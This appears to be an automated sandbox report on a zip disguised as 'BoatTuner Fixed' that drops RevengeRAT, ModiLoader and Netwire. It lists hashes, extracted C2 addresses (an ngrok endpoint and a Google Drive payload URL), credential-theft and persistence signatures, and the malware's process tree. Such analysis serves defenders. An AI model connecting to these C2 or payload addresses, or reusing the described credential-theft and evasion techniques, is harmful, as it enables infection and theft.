Resubmissions

16-09-2024 13:30

240916-qrrtnazfnl 10

Analysis

  • max time kernel
    655s
  • max time network
    661s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-09-2024 13:30

Errors

Reason
Machine shutdown

General

  • Target

    BoatTuner Fixed-4644-1-0-1705794066.zip

  • Size

    3KB

  • MD5

    cf68c426ab75a4f8c161d664296a5b66

  • SHA1

    725e040db642920daebf737de056a7cec37fb6e2

  • SHA256

    f459f7494cc498deccb42f8bdfa371ee6e63f354c077f8523391a410af22bd5c

  • SHA512

    4be5aa44ea4d418712b2c28b10d513d3e885c6dec3728e6fe86b2ee48251ad24f77778f16f6e06e537d44f99e3a7c72d774f03f8ae49da656d8794a7fa3b3ef5

Malware Config

Extracted

Family

revengerat

Botnet

Guest

C2

0.tcp.ngrok.io:19521

Mutex

RV_MUTEX

Extracted

Family

modiloader

C2

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • ModiLoader First Stage 2 IoCs
  • RevengeRat Executable 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 54 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Uses the VBS compiler for execution 1 TTPs
  • Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs

    UAC Bypass Attempt via SilentCleanup Task.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 30 IoCs
  • Modifies WinLogon 2 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 41 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • NTFS ADS 13 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 24 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 9 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\BoatTuner Fixed-4644-1-0-1705794066.zip"
    1⤵
      PID:412
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
      1⤵
      • Enumerates system info in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd63446f8,0x7fffd6344708,0x7fffd6344718
        2⤵
          PID:4308
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
          2⤵
            PID:3976
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4168
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
            2⤵
              PID:3532
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
              2⤵
                PID:804
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                2⤵
                  PID:4336
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
                  2⤵
                    PID:832
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
                    2⤵
                      PID:4500
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:8
                      2⤵
                        PID:2152
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4616
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                        2⤵
                          PID:2212
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
                          2⤵
                            PID:3632
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5448 /prefetch:8
                            2⤵
                              PID:800
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5540 /prefetch:8
                              2⤵
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3772
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
                              2⤵
                                PID:4732
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
                                2⤵
                                  PID:4760
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
                                  2⤵
                                    PID:4352
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5836 /prefetch:8
                                    2⤵
                                      PID:3384
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2092 /prefetch:1
                                      2⤵
                                        PID:3708
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
                                        2⤵
                                          PID:1832
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6300 /prefetch:8
                                          2⤵
                                            PID:4400
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2544
                                          • C:\Users\Admin\Downloads\RevengeRAT.exe
                                            "C:\Users\Admin\Downloads\RevengeRAT.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3832
                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                              3⤵
                                              • Drops startup file
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • NTFS ADS
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3352
                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                4⤵
                                                  PID:1888
                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s6caz1er.cmdline"
                                                  4⤵
                                                    PID:2680
                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB711.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc811D5DD891EA40B0AE7E1165EF2AABA2.TMP"
                                                      5⤵
                                                        PID:3896
                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ckuzkf-c.cmdline"
                                                      4⤵
                                                        PID:3932
                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7CD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2793EC7D86754EB9A0C4BF52C060EF29.TMP"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1684
                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gwd8u6ys.cmdline"
                                                        4⤵
                                                          PID:1908
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB859.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7F1E4083C21D418AB41DF8B6FCEF754C.TMP"
                                                            5⤵
                                                              PID:4736
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\24c3btrb.cmdline"
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3324
                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8B7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6FCA921F7587417BA5C5E2ABF2ED3C.TMP"
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3004
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jt5nbo43.cmdline"
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:748
                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB934.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc80A27D59A81B40889C135AA1D1E5A5AE.TMP"
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4020
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hzjicbtt.cmdline"
                                                            4⤵
                                                              PID:1908
                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9E0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9EC62C45B6E6405A8D9488625386FF0.TMP"
                                                                5⤵
                                                                  PID:2324
                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zqvrdanb.cmdline"
                                                                4⤵
                                                                  PID:2964
                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA3E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2521490F46D044C2B15DA8B75983C423.TMP"
                                                                    5⤵
                                                                      PID:2680
                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sx1p7ec6.cmdline"
                                                                    4⤵
                                                                      PID:5004
                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBADA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE42209DB27340E093456262BC1DEF.TMP"
                                                                        5⤵
                                                                          PID:3968
                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cud7lukt.cmdline"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1524
                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB67.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8672A1AA45FE4E29B5CDD64E833484C8.TMP"
                                                                          5⤵
                                                                            PID:4960
                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3jnqcyv5.cmdline"
                                                                          4⤵
                                                                            PID:3008
                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBF3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc42672E67B0C44EFC9B9480C3E321DF56.TMP"
                                                                              5⤵
                                                                                PID:1048
                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sx0zghgr.cmdline"
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:964
                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC80.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB7DD6C5F9B0E45908E738015947B1623.TMP"
                                                                                5⤵
                                                                                  PID:1684
                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\566iwp1h.cmdline"
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4256
                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD0D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEE470F0E7EA34E62AE8465814B7E7194.TMP"
                                                                                  5⤵
                                                                                    PID:4020
                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o_n7ubod.cmdline"
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1180
                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD99.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB86AF3E997894F0B8482C25115AD3A12.TMP"
                                                                                    5⤵
                                                                                      PID:2276
                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9ek7-phu.cmdline"
                                                                                    4⤵
                                                                                      PID:2324
                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE26.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7846F34E63004706A57ED01939284AB6.TMP"
                                                                                        5⤵
                                                                                          PID:4228
                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\73zzuklv.cmdline"
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4592
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEA3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7C766992573B41C48884E8B7E939A30.TMP"
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:428
                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\raptpiyg.cmdline"
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2132
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF10.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9032D98F32EF437691AD67D928A89C41.TMP"
                                                                                          5⤵
                                                                                            PID:4844
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yttotpv5.cmdline"
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4600
                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFAC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAB0D25A872904DE38254993B369E7.TMP"
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4736
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nnbncnhl.cmdline"
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3068
                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC01A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8E5BF2F1F474DCF99C78E79C34DE637.TMP"
                                                                                            5⤵
